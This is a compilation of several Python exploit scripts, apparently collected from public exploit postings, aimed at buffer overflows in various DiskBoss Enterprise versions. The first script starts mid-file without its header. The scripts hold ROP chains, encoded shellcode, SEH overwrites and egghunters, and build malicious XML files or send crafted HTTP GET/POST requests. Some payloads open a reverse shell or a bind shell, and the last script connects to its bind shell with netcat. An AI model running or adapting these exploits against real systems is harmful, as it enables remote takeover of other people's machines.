#========================================================================================================================
import struct
buff = "a"*1312
#push esp | pop esi | retn 4
buff += struct.pack("<L",0x65247445)
#mov eax, esi | pop esi | retn 4
buff += struct.pack("<L",0x65273f24)
buff += "PADD"
buff += "PADD"
#pop ebx | retn
buff += struct.pack("<L",0x65222936)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += struct.pack("<L",0x0101015a)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
#jmp eax
buff += struct.pack("<L",0x65217d28)
#inc eax
buff += "\x40"*20
#msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw
sc = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
sc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
sc += "\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
sc += "\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
sc += "\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
sc += "\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
sc += "\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
sc += "\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
sc += "\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
sc += "\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
sc += "\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
sc += "\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
sc += "\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
sc += "\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
sc += "\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
sc += "\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
sc += "\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
sc += "\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
sc += "\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
sc += "\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
sc += "\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
sc += "\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
sc += "\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
sc += "\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
sc += "\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
sc += "\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
sc += "\x43\x48\x50\x65\x55\x50\x41\x41"
buff += sc
f = open("shareName.txt","wb")
f.write(buff)
f.close()
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer
Overflow
# Date: 29-09-2017
# Website: www.touhidshaikh.com
# Contact: https://github.com/touhidshaikh
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. right Click, click on Import Command
# 2. select evil.xml , Booom Calc POPED up.. ;)
#========================================================================================================================
import os,struct
import sys
#offset to eip
junk = "A" * (1560)
#JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L',0x651bb77a)
#NOPS
nops = "\x90"
#LEA EAX, [ESP+76]
esp = "\x8D\x44\x24\x4c"
#JMP ESP
jmp2 = "\xFF\xE0"
#Jump short 5
nseh = "\x90\x90\xEB\x05"
#POP POP RET
seh = struct.pack('<L',0x6501DE41)
#CALC.EXE pop shellcode
shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
# FINAL PAYLOAD
buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops
* 10 + shellcode
#FILE
file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf +
'\n</classify>'
f = open('evil.xml', 'w')
f.write(file)
f.close()
#GREETZ ----------
#Taushif(Brother)
#-----------------
#!/usr/bin/env python
# Exploit Title: DiskBoss Enterprise v8.2.14 Remote buffer overflow
# Date: 2017-07-30
# Exploit Author: Ahmad Mahfouz
# Author Homepage: www.unixawy.com
# Vendor Homepage: http://www.diskboss.com/
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.2.14.exe
# Version: v8.2.14
# Tested on: Windows 7 SP1 x64
# Category; Windows Remote Exploit
# Description: DiskBoss Enterprise with management web-console enabled can lead to full system takeover.
import socket,sys
print "-----------------------------------------"
print "- DiskBoss Enterprise v8.2.14 TakeOver -"
print "- Tested on windows 7 x64 -"
print "- by @eln1x -"
print "-----------------------------------------"
try:
target = sys.argv[1]
except:
print "Usage ./DB_E_v8.2.14.py 192.168.1.2"
sys.exit(1)
port = 80
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.72.136 LPORT=443 EXITFUN=none -e x86/alpha_mixed -f python
shellcode = "\x89\xe0\xdd\xc0\xd9\x70\xf4\x58\x50\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x6d\x38\x4c"
shellcode += "\x42\x35\x50\x77\x70\x67\x70\x65\x30\x4b\x39\x6a\x45"
shellcode += "\x36\x51\x59\x50\x61\x74\x6e\x6b\x70\x50\x56\x50\x4e"
shellcode += "\x6b\x30\x52\x64\x4c\x6c\x4b\x71\x42\x72\x34\x6e\x6b"
shellcode += "\x73\x42\x36\x48\x34\x4f\x58\x37\x70\x4a\x54\x66\x36"
shellcode += "\x51\x6b\x4f\x4c\x6c\x57\x4c\x43\x51\x61\x6c\x44\x42"
shellcode += "\x76\x4c\x45\x70\x69\x51\x78\x4f\x46\x6d\x65\x51\x59"
shellcode += "\x57\x6d\x32\x4c\x32\x33\x62\x43\x67\x6c\x4b\x36\x32"
shellcode += "\x74\x50\x4e\x6b\x61\x5a\x55\x6c\x4c\x4b\x30\x4c\x46"
shellcode += "\x71\x43\x48\x68\x63\x67\x38\x55\x51\x6a\x71\x66\x31"
shellcode += "\x4c\x4b\x42\x79\x37\x50\x55\x51\x6b\x63\x4e\x6b\x67"
shellcode += "\x39\x66\x78\x6a\x43\x67\x4a\x37\x39\x6c\x4b\x37\x44"
shellcode += "\x4c\x4b\x77\x71\x6e\x36\x36\x51\x49\x6f\x4c\x6c\x7a"
shellcode += "\x61\x38\x4f\x36\x6d\x66\x61\x6a\x67\x55\x68\x59\x70"
shellcode += "\x42\x55\x4a\x56\x76\x63\x43\x4d\x5a\x58\x37\x4b\x63"
shellcode += "\x4d\x56\x44\x51\x65\x7a\x44\x43\x68\x6e\x6b\x31\x48"
shellcode += "\x37\x54\x56\x61\x58\x53\x51\x76\x6e\x6b\x46\x6c\x62"
shellcode += "\x6b\x6e\x6b\x61\x48\x65\x4c\x46\x61\x5a\x73\x4e\x6b"
shellcode += "\x44\x44\x6c\x4b\x63\x31\x5a\x70\x4f\x79\x61\x54\x37"
shellcode += "\x54\x34\x64\x31\x4b\x43\x6b\x33\x51\x66\x39\x61\x4a"
shellcode += "\x70\x51\x79\x6f\x69\x70\x71\x4f\x31\x4f\x30\x5a\x6c"
shellcode += "\x4b\x45\x42\x48\x6b\x4c\x4d\x31\x4d\x61\x78\x34\x73"
shellcode += "\x57\x42\x75\x50\x43\x30\x73\x58\x72\x57\x61\x63\x67"
shellcode += "\x42\x61\x4f\x73\x64\x61\x78\x50\x4c\x64\x37\x51\x36"
shellcode += "\x34\x47\x69\x6f\x58\x55\x6d\x68\x5a\x30\x36\x61\x75"
shellcode += "\x50\x53\x30\x64\x69\x4b\x74\x61\x44\x66\x30\x35\x38"
shellcode += "\x66\x49\x4d\x50\x32\x4b\x65\x50\x39\x6f\x49\x45\x62"
shellcode += "\x70\x50\x50\x56\x30\x42\x70\x67\x30\x70\x50\x67\x30"
shellcode += "\x52\x70\x70\x68\x78\x6a\x36\x6f\x69\x4f\x49\x70\x69"
shellcode += "\x6f\x4b\x65\x6f\x67\x62\x4a\x35\x55\x51\x78\x6b\x70"
shellcode += "\x6e\x48\x67\x38\x6b\x38\x51\x78\x73\x32\x63\x30\x76"
shellcode += "\x61\x4f\x4b\x4f\x79\x6a\x46\x33\x5a\x56\x70\x63\x66"
shellcode += "\x71\x47\x71\x78\x5a\x39\x4c\x65\x31\x64\x35\x31\x39"
shellcode += "\x6f\x78\x55\x6b\x35\x4b\x70\x52\x54\x64\x4c\x59\x6f"
shellcode += "\x42\x6e\x73\x38\x44\x35\x5a\x4c\x70\x68\x5a\x50\x6f"
shellcode += "\x45\x4e\x42\x73\x66\x59\x6f\x4a\x75\x30\x68\x35\x33"
shellcode += "\x50\x6d\x32\x44\x75\x50\x4f\x79\x69\x73\x73\x67\x70"
shellcode += "\x57\x32\x77\x55\x61\x49\x66\x51\x7a\x64\x52\x61\x49"
shellcode += "\x70\x56\x7a\x42\x49\x6d\x70\x66\x4b\x77\x33\x74\x66"
shellcode += "\x44\x67\x4c\x77\x71\x53\x31\x6e\x6d\x37\x34\x65\x74"
shellcode += "\x34\x50\x39\x56\x73\x30\x33\x74\x62\x74\x52\x70\x61"
shellcode += "\x46\x33\x66\x76\x36\x30\x46\x36\x36\x62\x6e\x32\x76"
shellcode += "\x50\x56\x66\x33\x43\x66\x71\x78\x71\x69\x5a\x6c\x77"
shellcode += "\x4f\x4c\x46\x4b\x4f\x5a\x75\x6e\x69\x59\x70\x62\x6e"
shellcode += "\x30\x56\x67\x36\x6b\x4f\x30\x30\x31\x78\x55\x58\x6c"
shellcode += "\x47\x45\x4d\x71\x70\x59\x6f\x6b\x65\x4d\x6b\x38\x70"
shellcode += "\x38\x35\x6e\x42\x76\x36\x50\x68\x69\x36\x6f\x65\x6d"
shellcode += "\x6d\x6d\x4d\x6b\x4f\x6b\x65\x47\x4c\x36\x66\x63\x4c"
shellcode += "\x75\x5a\x4f\x70\x6b\x4b\x4b\x50\x50\x75\x57\x75\x6f"
shellcode += "\x4b\x43\x77\x62\x33\x70\x72\x32\x4f\x50\x6a\x75\x50"
shellcode += "\x42\x73\x6b\x4f\x39\x45\x41\x41"
payload = shellcode
payload += 'A' * (2492 - len(payload))
payload += '\xEB\x10\x90\x90' # NSEH: First Short JMP
payload += '\xCA\xA8\x02\x10' # SEH : POP EDI POP ESI RET 04 libpal.dll
payload += '\x90' * 10
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode
payload += 'D' * (5000-len(payload))
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((target,port))
print "[*] Connection Success."
except:
print "Connction Refused %s:%s" %(target,port)
sys.exit(2)
packet = "GET /../%s HTTP/1.1\r\n" %payload
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Paragma: no-cache\r\n"
packet += "Cahce-Control: no-cache\r\n"
packet += "User-Agent: H4X0R\r\n"
packet += "Referer: http://google.com\r\n"
packet += "\r\n"
print "[*] Get nt authority or die hard"
s.send(packet)
s.close()
#!/usr/bin/env python
# Exploit Title: DiskBoss Enterprise v7.8.16 - 'Import Command' Buffer Overflow
# Date: 2017-03-29
# Exploit Author: Daniel Teixeira
# Author Homepage: www.danielteixeira.com
# Vendor Homepage: http://www.diskboss.com
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.8.16.exe
# Version: 9.5.12
# Tested on: Windows 7 SP1 x86
import os,struct
#Buffer overflow
junk = "A" * 1536
#JMP ESP (QtGui4.dll)
jmpesp= struct.pack('<L',0x651bb77a)
#NOPS
nops = "\x90"
#LEA EAX, [ESP+76]
esp = "\x8D\x44\x24\x4C"
#JMP ESP
jmp = "\xFF\xE0"
#JMP Short = EB 05
nSEH = "\x90\x90\xEB\x05" #Jump short 5
#POP POP RET (libspp.dll)
SEH = struct.pack('<L',0x10015FFE)
#CALC.EXE
shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
#PAYLOAD
payload = junk + jmpesp + nops * 16 + esp + jmp + nops * 68 + nSEH + SEH + nops * 10 + shellcode + nops * 5000
#FILE
file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + payload + '\n</classify>'
f = open('Exploit.xml', 'w')
f.write(file)
f.close()
#!/usr/bin/python
# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
# Date: 10-01-2017
# Exploit Author: Wyndell Bibera
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
# Version: 7.5.12
# Tested on: Windows XP Professional SP3
import socket
ip = "192.168.86.150"
port = 80
egg = "ezggezgg"
nopslide = "\x90" * 8
# Bad characters: \x00\x09\x0a\x0d\x20
# Reverse Shell @ Port 443 - Change shellcode section accordingly
shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
"\x7e\x97\x50\x56\x7e\xb2")
scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
shortjmp = "\xeb\x0f\x90\x90"
# Search for string 'ezgg' twice
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
extra = "\x90" * 9
pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))
# POP POP RET Instruction
seh = "\x6b\xa6\x02\x10"
buffer = (
"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
"Host: :192.168.86.150\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/* ;q=0.8\r\n\r\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(buffer)
s.close()
#!/usr/bin/python
import socket,os,time
#SEH Stack Overflow in GET request
#DiskBoss Enterprise 7.4.28
#Tested on Windows XP SP3 & Windows 7 Professional
#For educational proposes only
host = "192.168.1.20"
port = 80
#badchars \x00\x09\x0a\x0d\x20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
#Overwrite SEH handler
stackpivot = "\x5c\x60\x04\x10" #ADD ESP,0x68 + RETN
buf_len = 5250
crash = "\x90"*20 + buf + "\x41"*(2491-20-len(buf)) + stackpivot + "\x44"*(buf_len-8-2487)
request = "GET /" + crash + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(request)
s.close()
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + host + " 4444")